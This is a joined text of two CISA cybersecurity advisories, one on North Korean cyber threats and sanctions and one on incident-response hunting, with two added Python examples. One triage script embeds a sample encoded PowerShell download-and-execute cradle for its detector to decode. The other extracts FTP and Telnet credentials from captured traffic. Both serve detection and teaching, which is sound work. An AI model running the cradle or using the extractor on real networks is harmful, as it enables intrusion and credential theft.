 * **Share Technical Information of the DPRK Cyber Threat.** Information sharing at both the national and international levels to detect and defend against the DPRK cyber threat will enable enhanced cybersecurity of networks and systems. Best practices should be shared with governments and the private sector. Under the provisions of the Cybersecurity Information Sharing Act of 2015 (6 U.S.C. §§ 1501–1510), non-federal entities may share cyber threat indicators and defensive measures related to HIDDEN COBRA with federal and non-federal entities.
 * **Implement and Promote Cybersecurity Best Practices.** Adopting measures – both technical and behavioral – to enhance cybersecurity will make U.S. and global cyber infrastructure more secure and resilient. Financial institutions, including money services businesses, should take independent steps to protect against malicious DPRK cyber activities. Such steps may include, but are not limited to, sharing threat information through government and/or industry channels, segmenting networks to minimize risks, maintaining regular backup copies of data, undertaking awareness training on common social engineering tactics, implementing policies governing information sharing and network access, and developing cyber incident response plans. The Department of Energy’s Cybersecurity Capability Maturity Model and the National Institute of Standards and Technology’s Cybersecurity Framework provide guidance on developing and implementing robust cybersecurity practices. As shown in Annex I, the Cybersecurity and Infrastructure Security Agency (CISA) provides extensive resources, including technical alerts and malware analysis reports, to enable network defenders to identify and reduce exposure to malicious cyber activities.
 * **Notify Law Enforcement.** If an organization suspects that it has been the victim of malicious cyber activity, emanating from the DPRK or otherwise, it is critical to notify law enforcement in a timely fashion. This not only can expedite the investigation, but also, in the event of a financial crime, can increase the chances of recovering any stolen assets. U.S. law enforcement has seized millions of dollars’ worth of digital currency stolen by North Korean cyber actors. All types of financial institutions, including money services businesses, are encouraged to cooperate on the front end by complying with U.S. law enforcement requests for information regarding these cyber threats, and on the back end by identifying forfeitable assets upon receipt of a request from U.S. law enforcement or U.S. court orders, and by cooperating with U.S. law enforcement to support the seizure of such assets.
 * **Strengthen Anti-Money Laundering (AML) / Countering the Financing of Terrorism (CFT) / Counter-Proliferation Financing (CPF) Compliance.** Countries should swiftly and effectively implement the Financial Action Task Force (FATF) standards on AML/CFT/CPF. This includes ensuring financial institutions and other covered entities employ risk mitigation measures in line with the FATF standards and FATF public statements and guidance.
Specifically, the FATF has called for all countries to apply countermeasures to protect the international financial system from the ongoing money laundering, terrorist financing, and proliferation financing risks emanating from the DPRK.[[1]](<https://www.fatf-gafi.org/publications/high-risk-and-other-monitored-jurisdictions/documents/call-for-action-february-2020.html>) This includes advising all financial institutions and other covered entities to give special attention to business relationships and transactions with the DPRK, including DPRK companies, financial institutions, and those acting on their behalf. In line with UN Security Council Resolution 2270 Operative Paragraph 33, Member States should close existing branches, subsidiaries, and representative offices of DPRK banks within their territories and terminate correspondent relationships with DPRK banks. \n\nFurther, in June 2019, FATF amended its standards to require all countries regulate and supervise digital asset service providers, including digital currency exchanges, and mitigate against risks when engaging in digital currency transactions. Digital asset service providers should remain alert to changes in customers\u2019 activities, as their business may be used to facilitate money laundering, terrorist financing, and proliferation financing. The United States is particularly concerned about platforms that provide anonymous payment and account service functionality without transaction monitoring, suspicious activity reporting, and customer due diligence, among other obligations. \nU.S. 
financial institutions, including foreign-located digital asset service providers doing business in whole or substantial part in the United States, and other covered businesses and persons should ensure that they comply with their regulatory obligations under the Bank Secrecy Act (as implemented through the Department of the Treasury\u2019s Financial Crimes Enforcement Network (FinCEN) regulations in 31 CFR Chapter X). For financial institutions, these obligations include developing and maintaining effective anti-money laundering programs that are reasonably designed to prevent the money services business from being used to facilitate money laundering and the financing of terrorist activities, as well as identifying and reporting suspicious transactions, including those conducted, affected, or facilitated by cyber events or illicit finance involving digital assets, in suspicious activity reporting to FinCEN. \n\n#### International Cooperation\n\nTo counter the DPRK\u2019s malicious cyber activities, the United States regularly engages with countries around the world to raise awareness of the DPRK cyber threat by sharing information and evidence via diplomatic, military, law enforcement and judicial, network defense, and other channels. To hamper the DPRK\u2019s efforts to steal funds through cyber means and to defend against the DPRK\u2019s malicious cyber activities, the United States strongly urges countries to strengthen network defense, shutter DPRK joint ventures in third countries, and expel foreign-located North Korean information technology (IT) workers in a manner consistent with applicable international law. A 2017 UN Security Council resolution required all Member States to repatriate DPRK nationals earning income abroad, including IT workers, by December 22, 2019. 
The United States also seeks to enhance the capacity of foreign governments and the private sector to understand, identify, defend against, investigate, prosecute, and respond to DPRK cyber threats and participate in international efforts to help ensure the stability of cyberspace. \n\n### Consequences of Engaging in Prohibited or Sanctionable Conduct\n\nIndividuals and entities engaged in or supporting DPRK cyber-related activity, including processing related financial transactions, should be aware of the potential consequences of engaging in prohibited or sanctionable conduct.\n\nThe Department of the Treasury\u2019s Office of Foreign Assets Control (OFAC) has the authority to impose sanctions on any person determined to have, among other things:\n\n * Engaged in significant activities undermining cybersecurity on behalf of the Government of North Korea or the Workers\u2019 Party of Korea;\n * Operated in the information technology (IT) industry in North Korea;\n * Engaged in certain other malicious cyber-enabled activities; or\n * Engaged in at least one significant importation from or exportation to North Korea of any goods, services, or technology.\n\nAdditionally, if the Secretary of the Treasury, in consultation with the Secretary of State, determines that a foreign financial institution has knowingly conducted or facilitated significant trade with North Korea, or knowingly conducted or facilitated a significant transaction on behalf of a person designated under a North Korea-related Executive Order, or under Executive Order 13382 (Weapons of Mass Destruction Proliferators and Their Supporters) for North Korea-related activity, that institution may, among other potential restrictions, lose the ability to maintain a correspondent or payable-through account in the United States.\n\nOFAC investigates apparent violations of its sanctions regulations and exercises enforcement authority, as outlined in the Economic Sanctions Enforcement Guidelines, 31 C.F.R. 
part 501, appendix A. Persons who violate the North Korea Sanctions Regulations, 31 C.F.R. part 510, may face civil monetary penalties of up to the greater of the applicable statutory maximum penalty or twice the value of the underlying transaction.\n\nThe 2019 POE mid-term report notes the DPRK\u2019s use, and attempted use, of cyber-enabled means to steal funds from banks and digital currency exchanges could violate multiple UN Security Council resolutions (UNSCRs) (i.e., UNSCR 1718 operative paragraph (OP) 8(d); UNSCR 2094, OPs 8 and 11; and UNSCR 2270, OP 32). The DPRK-related UNSCRs also provide various mechanisms for encouraging compliance with DPRK-related sanctions imposed by the UN. For example, the UN Security Council 1718 Committee may impose targeted sanctions (i.e., an asset freeze and, for individuals, a travel ban) on any individual or entity who engages in a business transaction with UN-designated entities or sanctions evasion. \n\nThe Department of Justice criminally prosecutes willful violations of applicable sanctions laws, such as the International Emergency Economic Powers Act, 50 U.S.C. \u00a7\u00a7 1701 et seq. Persons who willfully violate such laws may face up to 20 years of imprisonment, fines of up to $1 million or totaling twice the gross gain, whichever is greater, and forfeiture of all funds involved in such transactions. The Department of Justice also criminally prosecutes willful violations of the Bank Secrecy Act (BSA), 31 U.S.C. \u00a7\u00a7 5318 and 5322, which requires financial institutions to, among other things, maintain effective anti-money laundering programs and file certain reports with FinCEN. Persons violating the BSA may face up to 5 years imprisonment, a fine of up to $250,000, and potential forfeiture of property involved in the violations. Where appropriate, the Department of Justice will also criminally prosecute corporations and other entities that violate these statutes. 
The Department of Justice also works with foreign partners to share evidence in support of each other's criminal investigations and prosecutions.

Pursuant to 31 U.S.C. § 5318(k), the Secretary of the Treasury or the Attorney General may subpoena a foreign financial institution that maintains a correspondent bank account in the United States for records stored overseas. Where the Secretary of the Treasury or Attorney General provides written notice to a U.S. financial institution that a foreign financial institution has failed to comply with such a subpoena, the U.S. financial institution must terminate the correspondent banking relationship within ten business days. Failure to do so may subject the U.S. financial institution to daily civil penalties.

### DPRK Rewards for Justice

If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State's Rewards for Justice program could make you eligible to receive an award of up to $5 million. For further details, please visit [www.rewardsforjustice.net](<http://www.rewardsforjustice.net>).

### ANNEX I: USG Public Information on and Resources to Counter the DPRK Cyber Threat

**Office of the Director of National Intelligence Annual Worldwide Threat Assessments of the U.S. Intelligence Community.** In 2019, the U.S. Intelligence Community assessed that the DPRK poses a significant cyber threat to financial institutions, remains a cyber espionage threat, and retains the ability to conduct disruptive cyber attacks. The DPRK continues to use cyber capabilities to steal from financial institutions to generate revenue. Pyongyang's cybercrime operations include attempts to steal more than $1.1 billion from financial institutions across the world, including a successful cyber heist of an estimated $81 million from Bangladesh Bank. The report can be found at <https://www.dni.gov/files/ODNI/documents/2019-ATA-SFR---SSCI.pdf>.

**Cybersecurity and Infrastructure Security Agency (CISA) Technical Reports.** The U.S. government refers to the malicious cyber activities by the DPRK as HIDDEN COBRA. HIDDEN COBRA reports provide technical details on the tools and infrastructure used by DPRK cyber actors. These reports enable network defenders to identify and reduce exposure to the DPRK's malicious cyber activities. CISA's website contains the latest updates on these persistent threats: <https://www.us-cert.gov/northkorea>.

Additionally, CISA provides extensive cybersecurity and infrastructure security knowledge and practices to its stakeholders, shares that knowledge to enable better risk management, and puts it into practice to protect the nation's critical functions. Below are the links to CISA's resources:

 * Protecting Critical Infrastructure: <https://www.cisa.gov/protecting-critical-infrastructure>
 * Cyber Safety: <https://www.cisa.gov/cyber-safety>
 * Detection and Prevention: <https://www.cisa.gov/detection-and-prevention>
 * Information Sharing: <https://www.cisa.gov/information-sharing-and-awareness>
 * CISA Insights: <https://www.cisa.gov/insights>
 * Combating Cyber Crime: <https://www.cisa.gov/combating-cyber-crime>
 * Cyber Essentials: <https://www.cisa.gov/cyber-essentials>
 * Tips: <https://www.us-cert.gov/ncas/tips>
 * National Cyber Awareness System: <https://www.us-cert.gov/ncas>
 * Industrial Control Systems Advisories: <https://www.us-cert.gov/ics>
 * Report Incidents, Phishing, Malware, and Vulnerabilities: <https://www.us-cert.gov/report>

**FBI PIN and FLASH Reports.** FBI Private Industry Notifications (PIN) provide current information that will enhance the private sector's awareness of a potential cyber threat. FBI Liaison Alert System (FLASH) reports contain critical information collected by the FBI for use by specific private sector partners. They are intended to provide recipients with actionable intelligence that helps cybersecurity professionals and system administrators guard against the persistent malicious actions of cyber criminals. If you identify any suspicious activity within your enterprise or have related information, please contact FBI CyWatch immediately. For DPRK-related cyber threat PIN or FLASH reports, contact [cywatch@fbi.gov](<mailto:cywatch@fbi.gov>).

 * FBI Cyber Division: <https://www.fbi.gov/investigate/cyber>

**FBI Legal Attaché Program.** The FBI Legal Attaché's core mission is to establish and maintain liaison with principal law enforcement and security services in designated foreign countries.

 * <https://www.fbi.gov/contact-us/legal-attache-offices>

**U.S. Cyber Command Malware Information Release.** The Department of Defense's cyber forces actively seek out DPRK malicious cyber activities, including DPRK malware that exploits financial institutions, conducts espionage, and enables malicious cyber activities against the U.S. and its partners. U.S. Cyber Command periodically releases malware information, identifying vulnerabilities for industry and government to defend their infrastructure and networks against DPRK illicit activities. Malware information to bolster cybersecurity can be found at the following Twitter accounts: @US_CYBERCOM and @CNMF_VirusAlert.

**U.S. Department of the Treasury Sanctions Information and Illicit Finance Advisories.** _The Office of Foreign Assets Control's (OFAC's)_ online Resource Center provides a wealth of information regarding DPRK sanctions and sanctions with respect to malicious cyber-enabled activities, including sanctions advisories, relevant statutes, Executive Orders, rules, and regulations relating to DPRK and cyber-related sanctions. OFAC has also published several frequently asked questions (FAQs) relating to DPRK sanctions, cyber-related sanctions, and digital currency. For questions or concerns related to OFAC sanctions regulations and requirements, please contact OFAC's Compliance Hotline at 1-800-540-6322 or [OFAC_Feedback@treasury.gov](<mailto:OFAC_Feedback@treasury.gov>).

 * DPRK Sanctions
   * <https://www.treasury.gov/resource-center/sanctions/Programs/pages/nkorea.aspx>
   * FAQs: <https://www.treasury.gov/resource-center/faqs/Sanctions/Pages/faq_other.aspx#nk>
 * Malicious Cyber Activities Sanctions
   * <https://www.treasury.gov/resource-center/sanctions/Programs/pages/cyber.aspx>
   * FAQs: <https://www.treasury.gov/resource-center/faqs/Sanctions/Pages/faq_other.aspx#cyber>
 * FAQs on Virtual Currency: <https://www.treasury.gov/resource-center/faqs/Sanctions/Pages/faq_compliance.aspx#vc_faqs>

_**Financial Crimes Enforcement Network (FinCEN)**_ has issued an advisory on North Korea's use of the international financial system (<https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2017-a008>). FinCEN also issued specific advisories to financial institutions with suspicious activity reporting obligations that provide guidance on when and how to report cybercrime and/or digital currency-related criminal activity:

 * Cybercrime
   * <https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2016-a005>
 * Illicit digital currency activity
   * <https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2019-a003>
 * Business e-mail compromise
   * <https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2019-a005>
   * <https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2016-a003>

_**Federal Financial Institutions Examination Council (FFIEC)**_ developed the Cybersecurity Assessment Tool to help financial institutions identify their risks and determine their cybersecurity preparedness.
The assessment tool can be found at <https://www.ffiec.gov/cyberassessmenttool.htm>.

### ANNEX II: UN Panel of Experts Reports on the DPRK Cyber Threat

**UN 1718 Sanctions Committee (DPRK) Panel of Experts Reports.** The UN Security Council 1718 Sanctions Committee on the DPRK is supported by a Panel of Experts, who "gather, examine, and analyze information" from UN Member States, relevant UN bodies, and other parties on the implementation of the measures outlined in the UN Security Council Resolutions against North Korea. The Panel also makes recommendations on how to improve sanctions implementation by providing both a Midterm and a Final Report to the 1718 Committee. These reports can be found at <https://www.un.org/securitycouncil/sanctions/1718/panel_experts/reports>.

### References

[[1] FATF Call to Action on North Korea](<https://www.fatf-gafi.org/publications/high-risk-and-other-monitored-jurisdictions/documents/call-for-action-february-2020.html>)

### Revisions

 * April 15, 2020: Initial Version
 * April 30, 2020: Added PDF versions of this report in Arabic, French, Japanese, Korean, Portuguese, Spanish, and traditional Chinese.
 * June 16, 2020: Added PDF version of this report in Vietnamese.

_Advisory AA20-106A, "Guidance on the North Korean Cyber Threat"; last modified 2020-06-23; <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-106a>._

### Summary

This joint advisory is the result of a collaborative research effort by the cybersecurity authorities of five nations: Australia,[[1](<https://www.cyber.gov.au/>)] Canada,[[2](<https://www.cyber.gc.ca/en/>)] New Zealand,[[3](<https://www.ncsc.govt.nz/>)][[4](<https://www.cert.govt.nz/>)] the United Kingdom,[[5](<https://www.ncsc.gov.uk/>)] and the United States.[[6](<https://www.cisa.gov/>)] It highlights technical approaches to uncovering malicious activity and includes mitigation steps according to best practices.
The purpose of this report is to enhance incident response among partners and network administrators along with serving as a playbook for incident investigation.

#### **Key Takeaways**

When addressing potential incidents and applying best practice incident response procedures:

 * First, collect and remove for further analysis:
   * Relevant artifacts,
   * Logs, and
   * Data.
 * Next, implement mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.
 * Finally, consider soliciting incident response support from a third-party IT security organization to:
   * Provide subject matter expertise and technical support to the incident response,
   * Ensure that the actor is eradicated from the network, and
   * Avoid residual issues that could result in follow-up compromises once the incident is closed.

### Technical Details

The incident response process requires a variety of technical approaches to uncover malicious activity. Incident responders should consider the following activities.

 * **Indicators of Compromise (IOC) Search** – Collect known-bad indicators of compromise from a broad variety of sources, and search for those indicators in network and host artifacts. Assess results for further indications of malicious activity to eliminate false positives.
 * **Frequency Analysis** – Leverage large datasets to calculate normal traffic patterns in both network and host systems. Use these baselines to identify activity that is inconsistent with normal patterns. Variables often considered include timing, source location, destination location, port utilization, protocol adherence, file location, integrity via hash, file size, naming convention, and other attributes.
 * **Pattern Analysis** – Analyze data to identify repeating patterns that are indicative of either automated mechanisms (e.g., malware, scripts) or routine human threat actor activity. Filter out the data containing normal activity and evaluate the remaining data to identify suspicious or malicious activity.
 * **Anomaly Detection** – Conduct an analyst review (based on the team's knowledge of, and experience with, system administration) of collected artifacts to identify anomalies. Review unique values for various datasets and research associated data, where appropriate, to find anomalous activity that could be indicative of threat actor activity.

### Recommended Artifact and Information Collection

When hunting and/or investigating a network, it is important to review a broad variety of artifacts to identify any suspicious activity that may be related to the incident.
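Several items on the host-analysis checklist in this section (Base64-encoded PowerShell command lines, system-range accounts that have an interactive shell, and sequentially numbered archives) can be scripted as one repeatable triage pass. The script below is an added example, not code from the advisory, and runs over constructed sample data embedded inline: three process command lines, an `/etc/passwd` fragment, and a directory listing. It goes one step beyond the checklist by also flagging any second UID-0 account. The function and constant names are the example's own.

```python
"""Host triage for three items on the host-analysis checklist.

Added example (not from the advisory). All inputs are constructed sample
data: process command lines, an /etc/passwd fragment, and a directory listing.
"""
import base64
import json
import re
from typing import Dict, List, Optional

# --- Constructed sample inputs -------------------------------------------------
# A download cradle, encoded the way PowerShell expects: UTF-16LE, then Base64.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')".encode("utf-16-le")
).decode("ascii")
SAMPLE_CMDLINES = [
    f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_PAYLOAD}",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
proc:x:998:998::/var/lib/proc:/bin/bash
toor:x:0:0::/root:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
SAMPLE_FILES = ["1.zip", "2.zip", "3.zip", "10.rar", "Q3-report.zip", "notes.txt"]

# --- Check 1: Base64-encoded PowerShell command lines -------------------------
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match the common abbreviations, longest first.
ENC_FLAG = re.compile(r"(?i)\s-(?:encodedcommand|encodedc|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # tolerate stripped padding
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Not the UTF-16 PowerShell requires; keep the bytes readable for the analyst.
        return raw.decode("latin-1")


# --- Check 2: system-range accounts with an interactive shell -----------------
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash",
                      "/usr/bin/bash", "/usr/bin/zsh"}


def suspicious_passwd_entries(passwd_text: str, uid_min: int = 1000) -> List[str]:
    """Accounts below the normal-user UID range that can log in interactively,
    plus any UID-0 account other than root (a classic backdoor)."""
    hits = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if uid == 0 and name != "root":
            hits.append(name)
        elif 0 < uid < uid_min and shell in INTERACTIVE_SHELLS:
            hits.append(name)
    return hits


# --- Check 3: sequentially numbered archives (exfiltration staging) ----------
STAGING_NAME = re.compile(r"^\d{1,4}\.(?:zip|rar|7z)$", re.IGNORECASE)


def staging_archives(file_names: List[str]) -> List[str]:
    """Numbered archive names such as 1.zip, 2.zip; two or more is worth a look."""
    hits = sorted((n for n in file_names if STAGING_NAME.match(n)),
                  key=lambda n: int(n.split(".", 1)[0]))
    return hits if len(hits) >= 2 else []


def triage() -> Dict[str, object]:
    """Run the three checks over the sample data and return one report."""
    return {
        "encoded_powershell": [d for d in map(decode_encoded_powershell, SAMPLE_CMDLINES) if d],
        "suspicious_accounts": suspicious_passwd_entries(SAMPLE_PASSWD),
        "staging_archives": staging_archives(SAMPLE_FILES),
    }


if __name__ == "__main__":
    print(json.dumps(triage(), indent=2))
```

Feed `decode_encoded_powershell` the command lines from an EDR export or Sysmon event ID 1, `suspicious_passwd_entries` the collected `/etc/passwd`, and `staging_archives` a listing of user-writable directories; the decoded script is what to triage next, since the Base64 wrapper is only an obfuscation layer.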
Consider collecting and reviewing the following artifacts throughout the investigation.

#### **Host-Based Artifacts**

 * Running Processes
 * Running Services
 * Parent-Child Process Trees
 * Integrity Hash of Background Executables
 * Installed Applications
 * Local and Domain Users
 * Unusual Authentications
 * Non-Standard Formatted Usernames
 * Listening Ports and Associated Services
 * Domain Name System (DNS) Resolution Settings and Static Routes
 * Established and Recent Network Connections
 * Run Key and other AutoRun Persistence
 * Scheduled Tasks
 * Artifacts of Execution (Prefetch and Shimcache)
 * Event logs
 * Anti-virus detections

#### **Information to Review for Host Analysis**

 * Identify any process that is not signed and is connecting to the internet, looking for beaconing or significant data transfers.
 * Collect all PowerShell command lines and look for Base64-encoded commands (`-EncodedCommand` and its abbreviations) to help identify fileless attacks.
 * Look for excessive `.RAR`, `7zip`, or `WinZip` processes, especially with suspicious file names, to help discover exfiltration staging (suspicious file names include sequential naming conventions such as `1.zip`, `2.zip`, etc.).
 * Collect all user logins and look for outlier behavior, such as a time of login that is out of the ordinary for the user or a login from an Internet Protocol (IP) address not normally used by the user.
 * On Linux/Unix operating systems (OSs) and services, collect all `cron` entries, `systemd` units, and `/etc/passwd`, looking for unusual accounts, such as accounts that appear to be system or service users (e.g., `proc`) but have an interactive shell such as `/bin/bash` rather than `/bin/false` or `nologin`.
 * On Microsoft OSs, collect Scheduled Tasks, Group Policy Objects (GPOs), and the Windows Management Instrumentation (WMI) repository on hosts of interest, looking for malicious persistence.
 * Use the Microsoft Windows Sysinternals Autoruns tool, which allows IT security practitioners to view, and if needed easily disable, most programs that automatically load onto the system.
 * Check the Windows registry and Volume Shadow Copy Service for evidence of intrusion.
 * Consider blocking script files like `.js`, `.vbs`, `.zip`, `.7z`, `.sfx`, and even Microsoft Office documents or PDFs.
 * Collect any scripts or binary ELF files from `/dev/shm`, `/tmp`, and `/var/tmp`.
 * List loaded kernel modules (`lsmod`) for signs of a rootkit; `dmesg` output can show signs of rootkit loading and device attachment, among other things.
 * Archive the contents of `/var/log` for all hosts.
 * Archive the output of `journald`. These logs are largely the same as `/var/log`; however, they provide some integrity checking and are not as easy to modify, and they will eventually replace the `/var/log` contents for some aspects of the system.
 * Check for additional Secure Shell (SSH) keys added to users' `authorized_keys` files.

#### **Network-Based Artifacts**

 * Anomalous DNS traffic and activity, unexpected DNS resolution servers, unauthorized DNS zone transfers, data exfiltration through DNS, and changes to `hosts` files
 * Remote Desktop Protocol (RDP), virtual private network (VPN) sessions, SSH terminal connections, and other remote access capabilities, evaluated for inbound connections, unapproved third-party tools, cleartext information, and unauthorized lateral movement
 * Uniform Resource Identifier (URI) strings, user agent strings, and proxy enforcement actions for abusive, suspicious, or malicious website access
 * Hypertext Transfer Protocol Secure/Secure Sockets Layer (HTTPS/SSL)
 * Unauthorized connections to known threat indicators
 * Telnet
 * Internet Relay Chat (IRC)
 * File Transfer Protocol (FTP)

#### **Information to Review for Network Analysis**

 * Look for new connections on previously unused ports.
 * Look for traffic patterns related to time, frequency, and byte count of the connections.
 * Preserve proxy logs. Add the URI parameters to the event log if possible.
 * Disable LLMNR on the corporate network; if unable to disable it, collect LLMNR (UDP port 5355) and NetBIOS-NS (UDP port 137) traffic.
 * Review changes to routing tables, such as weighting, static entries, gateways, and peer relationships.

### Common Mistakes in Incident Handling

After determining that a system or multiple systems may be compromised, system administrators and/or system owners are often tempted to take immediate actions. Although well intentioned to limit the damage of the compromise, some of those actions have the adverse effect of:

 1. Modifying volatile data that could give a sense of what has been done; and
 2. Tipping off the threat actor that the victim organization is aware of the compromise and forcing the actor to either hide their tracks or take more damaging actions (like detonating ransomware).

Below, and partially listed in Figure 1, are actions to avoid taking and some of the consequences of taking such actions.

 * **Mitigating the affected systems before responders can protect and recover data**
   * This can cause the loss of volatile data such as memory and other host-based artifacts.
   * The adversary may notice and change their tactics, techniques, and procedures.
 * **Touching adversary infrastructure (pinging, nslookup, browsing, etc.)**
   * These actions can tip off the adversary that they have been detected.
 * **Preemptively blocking adversary infrastructure**
   * Network infrastructure is fairly inexpensive. An adversary can easily change to new command and control infrastructure, and you will lose visibility of their activity.
 * **Preemptive credential resets**
   * The adversary likely has multiple credentials or, worse, has access to your entire Active Directory.
   * The adversary will use other credentials, create new credentials, or forge tickets.
 * **Failure to preserve or collect log data that could be critical to identifying access to the compromised systems**
   * If critical log types are not collected, or are not retained for a sufficient length of time, key information about the incident may not be determinable. Retain log data for at least one year.
 * **Communicating over the same network as the incident response is being conducted** (ensure all communications are held out-of-band)
 * **Only fixing the symptoms, not the root cause**
   * Playing "whack-a-mole" by blocking an IP address, without taking steps to determine what the binary is and how it got there, leaves the adversary an opportunity to change tactics and retain access to the network.

Figure 1: Common missteps to be avoided when responding to an incident

### Mitigations

The following recommendations and best practices may be helpful during the investigation and remediation process. **Note:** Although this guidance provides best practices to mitigate common attack vectors, organizations should tailor mitigations to their network.

#### **General Mitigation Guidance**

##### **Restrict or Discontinue Use of FTP and Telnet Services**

The FTP and Telnet protocols transmit credentials in cleartext, which are susceptible to being intercepted.
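To make "cleartext" concrete, the script below, an added example that is not part of the advisory, replays constructed FTP and Telnet client traffic (no real capture is read) and recovers the login from each: FTP's `USER`/`PASS` commands are read straight off the control connection, and a Telnet login is reassembled from keystroke-by-keystroke segments after stripping option negotiation and pairing the server's `login:`/`Password:` prompts with the client's replies. Anything on the path can do the same, which is the reason to retire both services. The session contents and the `strip_telnet_iac`, `ftp_credentials`, and `telnet_credentials` names are the example's own.

```python
"""Pull credentials out of captured FTP and Telnet client traffic.

Added example (not from the advisory). The byte strings below are constructed
to look like reassembled TCP payloads; no real capture is read.
"""
import re
from typing import Dict, List, Tuple

# --- Constructed sample traffic -----------------------------------------------
# Client->server side of an FTP control connection.
FTP_CLIENT_STREAM = b"USER backup\r\nPASS Winter2020!\r\nCWD /uploads\r\nQUIT\r\n"

# A Telnet login in arrival order. Option negotiation is mixed with text, the
# client sends one keystroke per segment (including one DEL to correct a typo),
# and the server echoes the username but not the password.
TELNET_SESSION: List[Tuple[str, bytes]] = [
    ("srv", b"\xff\xfd\x18\xff\xfd\x1f"),            # IAC DO TERMINAL-TYPE, IAC DO NAWS
    ("cli", b"\xff\xfb\x18\xff\xfb\x1f"),            # IAC WILL TERMINAL-TYPE, IAC WILL NAWS
    ("srv", b"Ubuntu 18.04 LTS\r\nrouter01 login: "),
    *[("cli", c) for c in (b"a", b"d", b"m", b"i", b"n", b"\r\x00")],
    ("srv", b"admin\r\nPassword: "),
    *[("cli", c) for c in (b"s", b"3", b"c", b"r", b"3", b"\x7f", b"e", b"t", b"\r\x00")],
    ("srv", b"\r\nWelcome to router01\r\n$ "),
]

# --- Telnet framing -------------------------------------------------------------
IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEGOTIATE = {0xFB, 0xFC, 0xFD, 0xFE}  # WILL, WONT, DO, DONT: three-byte commands


def strip_telnet_iac(data: bytes) -> bytes:
    """Remove Telnet option negotiation so only the terminal text remains."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i])
            i += 1
        elif i + 1 >= len(data):
            break                                     # dangling IAC at segment end
        elif data[i + 1] == IAC:
            out.append(IAC)                           # escaped literal 0xFF
            i += 2
        elif data[i + 1] in NEGOTIATE:
            i += 3
        elif data[i + 1] == SB:                       # subnegotiation runs to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:
            i += 2                                    # other two-byte commands (NOP, GA, ...)
    return bytes(out)


# --- Credential extraction ------------------------------------------------------
FTP_AUTH = re.compile(rb"^(USER|PASS)[ \t]+(.*?)\r?\n", re.MULTILINE | re.IGNORECASE)
PROMPT = re.compile(r"(login|username|password)\s*:\s*$", re.IGNORECASE)


def ftp_credentials(client_stream: bytes) -> List[Tuple[str, str]]:
    """(user, password) pairs from USER/PASS commands; both travel in the clear."""
    creds, user = [], None
    for cmd, arg in FTP_AUTH.findall(client_stream):
        if cmd.upper() == b"USER":
            user = arg.decode("utf-8", "replace")
        elif user is not None:
            creds.append((user, arg.decode("utf-8", "replace")))
            user = None
    return creds


def telnet_credentials(session: List[Tuple[str, bytes]]) -> Dict[str, str]:
    """Pair each server prompt with the line the client types in answer to it."""
    found: Dict[str, str] = {}
    pending = None          # which prompt is awaiting an answer
    typed = bytearray()     # keystrokes since the last line end
    for direction, payload in session:
        text = strip_telnet_iac(payload)
        if direction == "srv":
            m = PROMPT.search(text.decode("utf-8", "replace"))
            if m:
                pending = "password" if m.group(1).lower() == "password" else "username"
                typed.clear()
            continue
        for b in text:
            if b in (0x08, 0x7F):                     # backspace/delete edits the buffer
                if typed:
                    typed.pop()
            else:
                typed.append(b)
        if typed.endswith((b"\r\n", b"\r\x00", b"\n")):   # Telnet sends a bare CR as CR NUL
            line = typed.rstrip(b"\r\n\x00").decode("utf-8", "replace")
            typed.clear()
            if pending:
                found[pending] = line
                pending = None
    return found


if __name__ == "__main__":
    print("FTP:", ftp_credentials(FTP_CLIENT_STREAM))
    print("Telnet:", telnet_credentials(TELNET_SESSION))
```

Against real data, feed it the client-to-server payload of a reassembled TCP stream exported from a packet analyzer. The same parser doubles as a detection: any login it recovers after FTP and Telnet were supposed to be retired is a service that was missed.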
To mitigate this risk, discontinue FTP and Telnet services by moving to more secure file storage/file transfer and remote access services.

 * Evaluate business needs and justifications to host files on alternative Secure File Transfer Protocol (SFTP) or HTTPS-based public sites.
 * Use Secure Shell (SSH) for access to remote devices and servers.

##### **Restrict or Discontinue Use of Non-approved VPN Services**

 * Investigate the business needs and justification for allowing traffic from non-approved VPN services.
 * Identify such services across the enterprise and develop measures to add the applications and browser plugins that enable non-approved VPN services to the denylist.
 * Enhance endpoint monitoring to obtain visibility on devices with non-approved VPN services running. Enhanced endpoint monitoring and detection capabilities would enable an organization's IT security personnel to manage approved software as well as identify and remove any instances of unapproved software.

##### **Shut Down or Decommission Unused Services and Systems**

 * Cyber actors regularly identify servers that are out of date or end of life (EOL) to gain access to a network and perform malicious activities. These present easy and safe locations to maintain persistence on a network.
 * Often these services and servers are systems whose decommissioning has begun but whose final stage, shutting down the system, has not been completed. This means they are still running and vulnerable to compromise.
